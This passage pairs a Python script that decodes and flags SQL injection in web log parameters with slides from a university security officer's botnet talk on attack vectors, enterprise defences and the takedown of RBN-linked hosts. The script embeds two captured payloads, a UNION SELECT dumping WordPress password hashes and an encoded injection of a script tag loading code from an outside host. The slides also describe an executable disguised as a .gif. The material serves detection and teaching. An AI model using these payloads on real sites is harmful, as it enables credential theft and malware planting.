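    re.compile(r"/\*\s*$"),  # trailing comment that swallows the rest of the query
]


def decode_hex_literals(s):
    """Replace 0x... literals with the text they encode."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)  # odd length: not a string literal, leave it
        return bytes.fromhex(digits).decode("latin-1")
    return HEX_LITERAL.sub(repl, s)


def decode_param(raw):
    """URL-decode ('+' and %xx), then unwrap hex literals.  Percent-decodes
    twice to catch one level of double encoding."""
    once = unquote_plus(raw)
    twice = unquote_plus(once)
    return decode_hex_literals(twice)


def sqli_markers(decoded):
    return [p.pattern for p in SQLI_MARKERS if p.search(decoded)]


def review(raw):
    """Decode a parameter value and report which markers it trips."""
    decoded = decode_param(raw)
    hits = sqli_markers(decoded)
    return {"decoded": decoded, "markers": hits, "suspect": len(hits) >= 2}


# From the slide: the wp_users query (first log entry) and the obfuscated "page" value.
CAT_PARAM = ("999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),"
             "null,null,null+FROM+wp_users+where+id=1/*")
PAGE_PARAM = ("-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f"
              "73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A")

if __name__ == "__main__":
    for raw in (CAT_PARAM, PAGE_PARAM):
        r = review(raw)
        print(f"{'SUSPECT' if r['suspect'] else 'ok     '} {r['decoded']}")
```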

Pictures: phpBB photo galleries that permit users to post their own pictures

1. Evil user posts an executable file with a .gif extension (notapic.gif) to Webhost.com
2. Evil user browses to the executable gif
3. Webhost executes notapic.gif as the web page owner

Other means

Profiles of user accounts (Social Networking sites)
Comment sections that don’t require the user to authenticate
BB’s that permit users to create their own accounts without an administrator
User web pages
Departmental web pages
Traditional network vulnerability attacks

Protect Your Enterprise

AVOIDANCE

1. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control.

PREVENT

1. Ensure that all enterprise and local accounts have strong passwords. Configure Domain security policy to enforce this and auto-lockout.
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication.
4. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for Apache websites).
5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts.
6. Block outbound port 25 traffic except from your official mail servers.
7. Block outbound DNS requests except for iterative requests made through the official DNS servers (prevents spray and pray attacks).

Protect Your Enterprise

DETECT

1. Install and operate IDS/IPS systems (snort, etc).
2. Analyze network traffic for heuristic evidence of botlike behavior.
3. Google your own site: site:mysite.com viagra, site:mysite.com c99
4. Centralize and process logs, including workstation security and firewall logs.
5. Mine your anti-virus quarantines, abuse notifications, and infected systems for intelligence about botnet infections. Feed this information to your event correlation system.
6. Participate in or join quasi-intelligence organizations.

MITIGATE

1. Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.
2. Use your centralized logs to detect and react to password guessing schemes in near real time.
3. Report detections to an incident response team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system, then return it to the system owner along with a report on the successful attack vector.
4. Include known malware distribution sites in your proxy server block lists.
5. Establish a spearphishing hotline for quick response.

Protect Your Enterprise

REDUCE THE THREAT

1. Report new threats. Phishing attacks to the Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.
2. Feed the bot-related DNS attempts to your event correlation system.
3. Add SiteAdvisor or the IE7 anti-phishing feature to browsers.

REDUCE THE VULNERABILITY

1. Actively scan your site for vulnerabilities (OS, network, web apps, etc).

NON-REALTIME ANALYSIS, DETECTION, and RECOVERY

1. Analyze data collected to identify new intelligence markers.
2. Evaluate new signatures, new tools, etc.
3. Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.
4. Use forensic techniques and sandbox technology to gather intelligence from known compromised workstations.

RBN


RBN Operations (diagram): SPB IX, DELTASYS, DATAPOINT, SILVERNET, CREDOLINK, RBN, OINVEST, INFOBOX

11/21/07 Ref: Bizeul.org

RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/Intercage), ‘Pacific Internet Exchange’ (PIE), see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.

RBN USA Dead?

What Happened?

Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings. Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave Donaldson's people the power to send InterCage dark or, as he chose to do, stick InterCage in a sandbox.

By Angela Gunn, BetaNews, September 25, 2008, 10:40 PM
http://www.betanews.com/article/UnitedLayer_COO_Giving_access_to_InterCage_is_an_issue_of_ethics/1222396858

McColo


Effect of De-peering

50% Drop in Spam

Who’s Next?

In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted: EstDomains, Esthost, Hostfresh, Cernel.

EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to EstDomains. Tsastsin has links to organized crime and also heads up Rove Digital, a site also suspected of hosting malware servers.

Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh, the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August 2008 as backed by "gangs of cybercriminals" whose disappearance from the Web would be difficult to achieve, but would result in a safer Internet.

Agenda

• Botnet Overview

• Botnet Schemes

• How Do They Get In?

• What Can We Do?

• Concluding Thoughts


Source of all evil

Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, ISSAP
craigs@pdx.edu
Portland State University
CISO